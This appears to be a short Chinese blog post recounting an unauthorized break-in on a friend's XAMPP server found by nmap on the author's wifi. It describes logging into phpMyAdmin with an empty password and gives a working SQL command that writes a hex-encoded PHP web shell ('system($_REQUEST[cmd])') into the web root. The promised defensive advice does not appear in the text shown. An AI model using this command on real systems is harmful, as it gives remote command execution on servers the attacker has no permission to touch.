记录一次关于无聊时对基友MYSQL服务器的提权攻击。
尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。
0x01.从无聊的nmap扫描开始
今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。
看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。
登进去后,就想办法留个后门,搞个木马。注意一下,mysql是以管理员权限运行的,so...
查了下资料,这个很简单,网上很多。
找个一个表进去,用下面那句话,就搞定了。
SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E FROM user into outfile '/Applications/XAMPP/xamppfiles/phpmyadmin/fuck.php'
那一串字符就是 <?php system($_REQUEST[cmd]);?> 的十六进制编码了,